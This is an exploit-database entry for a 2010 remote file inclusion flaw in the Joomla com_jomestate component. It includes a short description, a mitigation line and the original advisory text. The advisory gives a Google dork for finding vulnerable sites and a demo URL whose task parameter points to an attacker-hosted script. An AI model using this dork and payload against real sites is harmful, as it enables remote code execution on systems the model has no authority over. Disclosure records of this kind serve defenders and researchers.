header-logo
Suggest Exploit
vendor:
Joomla com_jomestate
by:
Sid3^effects aKa HaRi
7,5
CVSS
HIGH
RFI Vulnerability
N/A
CWE
Product Name: Joomla com_jomestate
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla com_jomestate RFI Vulnerability

A remote file inclusion (RFI) vulnerability exists in Joomla com_jomestate component. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable server. The malicious URL contains a malicious script hosted on a remote server. When the vulnerable server receives the malicious URL, it will execute the malicious script on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any application logic.
Source

Exploit-DB raw data:

1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name : Joomla com_jomestate RFI Vulnerability 
Date : june, 21 2010
Critical Level 	: HIGH
Google DorK:inurl:com_jomestate
Vendor Url : http://www.opensourcetechnologies.com/
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz 

#######################################################################################################
Xploit: RFI Vulnerability 

DEMO URL 
   http://server/real_estate/index.php?option=com_jomestate&task=[ur evil script site]

###############################################################################################################
# 0day no more 
# Sid3^effects